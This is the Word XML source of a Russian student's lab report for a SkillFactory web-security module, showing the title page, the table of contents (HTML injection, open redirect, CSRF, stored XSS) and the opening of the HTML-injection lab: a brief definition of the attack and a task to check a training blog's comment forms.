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D72380" w14:textId="73C58078" w:rsidR="008C6571" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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bookmarkStart w:id="0" w:name="_Hlk122519221"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="006B3AE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ООО </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE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Скилфэктори</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2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”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416033F7" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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5A1C70" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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90A064" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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325FE3" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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A6004D" w14:textId="01802DCF" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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4535EBF4" wp14:editId="08CE0C74">
            <wp:extent cx="2169102" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0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111" cy="160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BF019" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE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1" w14:textId="1CE7A2C4" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Отч</w:t>
      </w:r>
      <w:r w:rsidR="00712AD5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ё</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>т по</w:t>
      </w:r>
      <w:r w:rsidR="00712AD5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> лабораторным работам модуля </w:t>
      </w:r>
      <w:r w:rsidR="008C6571" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5AC77" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right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EE352DD" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right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9C63A6C" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right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8296CFE" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right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0000002" w14:textId="4F662DAB" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="00712AD5" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right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B3AE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Выполнил</w:t>
      </w:r>
      <w:r w:rsidR="007E62E6" w:rsidRPr="006B3AE2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Pr="006B3AE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Михайлов Роман Александрович</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C051C2" w14:textId="2ECADE36" w:rsidR="008C6571" w:rsidRPr="006B3AE2" w:rsidRDefault="008C6571" w:rsidP="00E86FE6">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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Группа: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2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hacker</w:t>
      </w:r>
      <w:r w:rsidR="00E86FE6" w:rsidRPr="006B3AE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Pr="006B3AE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1008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EF14A" w14:textId="77777777" w:rsidR="00712AD5" w:rsidRPr="006B3AE2" w:rsidRDefault="00712AD5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4613D5" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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34C456EA" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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235E855C" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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2E8BD4F7" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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2DA980F" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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0808F431" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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7A22B8B4" w14:textId="77777777" w:rsidR="002C145A" w:rsidRPr="006B3AE2" w:rsidRDefault="002C145A" w:rsidP="00E86FE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62ED9BB6" w14:textId="7FC9C1F4" w:rsidR="00712AD5" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE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Санкт-Петербург 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF95C30" w14:textId="524FB098" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="002C145A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336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B3AE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СОДЕРЖАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56369F71" w14:textId="088FA54B" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC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92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731"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w14:paraId="766D83F3" w14:textId="77777777" w:rsidTr="00C20776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5386FA" w14:textId="4A8F3520" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00C20776">
            <w:pPr>
              <w:pStyle w:val="2"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto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B3AE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Лабораторная работа </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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№ </w:t>
            </w:r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</w:rPr>
              <w:t>14.2.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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“</w:t>
            </w:r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</w:rPr>
              <w:t xml:space="preserve">HTML </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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</w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00C101DE"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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> ....................................</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6E02C7" w14:textId="7D94C0EC" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00C207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B3AE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AF77CC" w:rsidRPr="006B3AE2" w14:paraId="730EC4B9" w14:textId="77777777" w:rsidTr="00C20776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="626C04A0" w14:textId="3B451A85" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00C20776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B3AE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Лабораторная работа </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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№ </w:t>
            </w:r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</w:rPr>
              <w:t>14.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r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</w:rPr>
              <w:t>.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B3AE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6B3AE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B3AE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Redirect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00C101DE"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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> .......................................</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64FA57FF" w14:textId="411853D2" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00C101DE" w:rsidP="00C207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B3AE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</w:tr>
      <w:tr w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w14:paraId="7074592F" w14:textId="77777777" w:rsidTr="00C20776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189DED69" w14:textId="7171F33F" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00C207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6B3AE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Лабораторная работа </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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№ </w:t>
            </w:r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</w:rPr>
              <w:t>14.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r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</w:rPr>
              <w:t>.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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“</w:t>
            </w:r>
            <w:r w:rsidR="00C20776" w:rsidRPr="006B3AE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GB"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00C20776"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  <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> .....................................................</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA9A6E3" w14:textId="43DF7E81" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00C20776" w:rsidP="00C207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6B3AE2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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w14:paraId="0B78663C" w14:textId="77777777" w:rsidTr="00C20776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A8E50B1" w14:textId="41C37BD7" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00C207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6B3AE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Лабораторная работа </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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№ </w:t>
            </w:r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</w:rPr>
              <w:t>14.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r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</w:rPr>
              <w:t>.</w:t>
            </w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B3AE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“</w:t>
            </w:r>
            <w:r w:rsidR="00C20776" w:rsidRPr="006B3AE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GB"/>
              </w:rPr>
              <w:t>XSS stored</w:t>
            </w:r>
            <w:r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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00C20776" w:rsidRPr="006B3AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="474747"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> ............................................</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BA7072" w14:textId="6FA92E97" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF517B" w:rsidP="00C207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B3A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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09C4EFAA" w14:textId="632AEFD3" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013F4BCC" w14:textId="744B71ED" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5E805F" w14:textId="7D6F717C" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37618BFF" w14:textId="3444897C" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445B1757" w14:textId="759B2E68" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5048C3" w14:textId="6C0439C7" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7929786E" w14:textId="46FE1EF4" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF64E62" w14:textId="0D29D3FB" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B5F783" w14:textId="17E52054" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C15F1C9" w14:textId="651725B3" w:rsidR="00AF77CC" w:rsidRPr="006B3AE2" w:rsidRDefault="00AF77CC" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440E2582" w14:textId="6DC1D220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3FA71707" w14:textId="082B35B2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7CB7B272" w14:textId="2E45B5E1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435F32F5" w14:textId="3632C004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53FD1937" w14:textId="2FBD42ED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0ABD3FD0" w14:textId="1945CD81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25E99785" w14:textId="0D669200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32FBC4D2" w14:textId="7FBA7651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2F59ECF3" w14:textId="27E3F2EE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6EEB6754" w14:textId="57E7FDAC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79FB8892" w14:textId="41B3481E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15E28323" w14:textId="2DCDA032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448766C5" w14:textId="197E6DC8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22465FCF" w14:textId="00D64CFD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38542FA5" w14:textId="10B4AD74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7E6EF847" w14:textId="0237C464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3075E8E6" w14:textId="36749EB8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32F9B72F" w14:textId="30F564B6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51255D67" w14:textId="217D169B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56D8F825" w14:textId="5CB49A5A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179252A7" w14:textId="63798FFB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49957CAE" w14:textId="06DCF9A7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6662385C" w14:textId="61190034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1729C27B" w14:textId="38169844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55DC294A" w14:textId="7A28EBBF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0EE905DC" w14:textId="1C928BFC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3D110BD4" w14:textId="6411C685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18F9C572" w14:textId="77777777" w:rsidR="00C101DE" w:rsidRPr="006B3AE2" w:rsidRDefault="00C101DE" w:rsidP="00AF77CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D9A5CC" w14:textId="650E2E55" w:rsidR="002C145A" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6" w:rsidP="00C101DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336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B3AE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Лабораторная работа </w:t>
      </w:r>
      <w:r w:rsidR="002C145A" w:rsidRPr="006B3AE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№ </w:t>
      </w:r>
      <w:r w:rsidR="00426C40" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>14.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000003" w14:textId="604A3C6F" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6" w:rsidP="002C145A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00426C40" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00426C40" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C145A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFF2AB" w14:textId="77777777" w:rsidR="0059648B" w:rsidRPr="006B3AE2" w:rsidRDefault="0059648B" w:rsidP="0059648B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313131"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0A18AE" w14:textId="0B7090B9" w:rsidR="0059648B" w:rsidRPr="006B3AE2" w:rsidRDefault="0059648B" w:rsidP="0059648B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313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки заключается во внедрении </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>-кода через уязвимые части веб-сайта. Злоумышленник отправляет </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve">-код через любое уязвимое поле с целью изменить дизайн веб-сайта или любую информацию, отображаемую пользователю. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40619384" w14:textId="1E005E43" w:rsidR="0059648B" w:rsidRPr="006B3AE2" w:rsidRDefault="0059648B" w:rsidP="0059648B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313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>В результате пользователь может увидеть данные, присланные злоумышленником. В общем случае </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>-инъекция — это инъекция кода языка разметки в документ страницы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D01B7" w14:textId="4CA786FF" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00D325AD" w:rsidP="0059648B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313131"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693CF795" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00D325AD" w:rsidP="00D325AD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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F30F8E" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00D325AD" w:rsidP="00D325AD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</w:p>
    <w:p w14:paraId="21A8A12A" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00D325AD" w:rsidP="00D325AD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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Мы решили вести свой блог, нашей компании важен </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>feedback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, поэтому мы добавили комментарии. Посмотрите, всё ли мы правильно сделали?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B9548" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00D325AD" w:rsidP="00D325AD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B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Особенно нас беспокоит создание форм на нашем сайте: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>http://51.250.73.193:8082</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000004" w14:textId="586454E1" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6" w:rsidP="00D325AD">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92CAA9" w14:textId="77777777" w:rsidR="004C597A" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E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B3A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5" w14:textId="667C6746" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Период тестирования: </w:t>
      </w:r>
      <w:r w:rsidR="002C145A" w:rsidRPr="006B3AE2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20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2C145A" w:rsidRPr="006B3AE2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12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2C145A" w:rsidRPr="006B3AE2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2022</w:t>
